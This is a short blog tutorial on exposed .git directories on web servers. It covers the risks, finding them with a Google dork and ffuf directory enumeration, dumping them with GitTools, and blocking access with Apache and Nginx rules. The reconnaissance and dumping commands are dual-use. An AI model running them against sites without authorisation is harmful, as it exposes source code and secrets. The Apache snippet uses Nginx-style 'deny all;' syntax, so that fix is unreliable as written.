k1ven
Posted on August 23, 2024
What is git?
Git is an open-source, distributed version control system (DVCS) that allows multiple developers to collaborate on a project by tracking changes to files and coordinating work. It enables users to create branches, merge changes, and revert to previous versions, making it a powerful tool for managing codebases of any size. With Git, each developer has a full copy of the repository, ensuring redundancy and enabling offline work. Its widespread adoption is driven by its flexibility, efficiency, and strong community support.
Potential Risks of Exposing a .git Directory
There are numerous risks associated with exposing a .git directory. For example, attackers can exploit this vulnerability to:
Exposure of Sensitive Information: Attackers can access the repository's history, including sensitive keys, credentials, and configuration files that might be stored in the repository. This could result in unauthorized access to other systems and services.
Project Cloning: If the .git directory is exposed, attackers can clone the entire project, gaining access to all the code, including proprietary or confidential information. This can lead to intellectual property theft or misuse.
Commit History Inspection: Attackers can inspect the commit history to find information that might have been accidentally committed, such as API keys, passwords, or other sensitive data that may have been removed but remains in the history.
Reconstruction of Past States: By accessing the .git directory, attackers can reconstruct the project's past states, potentially uncovering vulnerabilities that were fixed in later versions.
Analysis of Development Practices: Attackers can analyze your development practices, including how frequently commits are made, who is making them, and what changes are being implemented. This information can be used in social engineering attacks or to identify weaker points in your security posture.
Potential for Exploiting Security Vulnerabilities: If the source code is exposed, attackers can search for vulnerabilities in the code that might not have been publicly disclosed, increasing the risk of targeted attacks.
How to find a exposed .git?
There are several methods to identify an exposed .git directory. In this section, I will discuss two effective techniques: google dorks and directory enumeration.
Google Dorks
Refers to advanced search queries that use Google's search engine to find specific information that is often hidden or not easily accessible through standard searches. These queries leverage Google’s powerful search capabilities to uncover sensitive data, exposed files, or vulnerabilities on websites.
We can locate exposed .git directories using the intext
operator.
intext:"Index of /.git"
Directory Enumeration
Is a technique to discover hidden directories and files. This process involves systematically probing a website to identify paths and resources.
There are many automated tools available for directory enumeration. In this example, I will demonstrate how to use the ffuf
tool.
ffuf -u https://victim.com/FUZZ -w /path/to/wordlist
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : https://victim.com.br/FUZZ
:: Wordlist : FUZZ: /path/to/wordlist
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
.git [Status: 200, Size: 1923, Words: 20, Lines: 10, Duration: 122ms]
.git/config [Status: 200, Size: 221, Words: 29, Lines: 10, Duration: 92ms]
.git/HEAD [Status: 200, Size: 198, Words: 2, Lines: 10, Duration: 26ms]
If we look at .git/config
, we find something like:
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[remote "origin"]
url = https://victim.com
git
fetch +refs/heads/*:refs/remotes/origin/*
[branch "master"]
remote origin
merge refs/heads/master
How to get files from .git?
As previously mentioned, we can retrieve various files from the website. To accomplish this efficiently, we will use an automated tool to extract as many files as possible.
GitTools - Dumper
This tool can be used to download as much as possible from the found .git repository from webservers which do not have directory listing enabled.
This tool has no 100% guaranty to completely recover the .git repository. Especially if the repository has been compressed into pack-files, it may fail.
Usage:
bash ./gitdumper.py https://victim.com/.git/ output
We need to navigate to a specific version to view the files. Next, go to our folder and execute the following command:
git checkout -- .
How to fix this?
To mitigate this vulnerability, remove the .git folder from your web server or ensure that access to the .git directory is completely denied.
Apache
Update httpd.conf as follows:
<DirectoryMatch "^/.*/.git/">
deny all;
</DirectoryMatch>
Nginx
If you are using Nginx, add the following instructions to your nginx.conf file:
location ~ /.git/ {
deny all;
}
Conclusions
This is my first article; I hope you enjoyed it!
Honorable mention to my friend @Duk4s
Posted on August 23, 2024
Join Our Newsletter. No Spam, Only the good stuff.
Sign up to receive the latest update from our blog.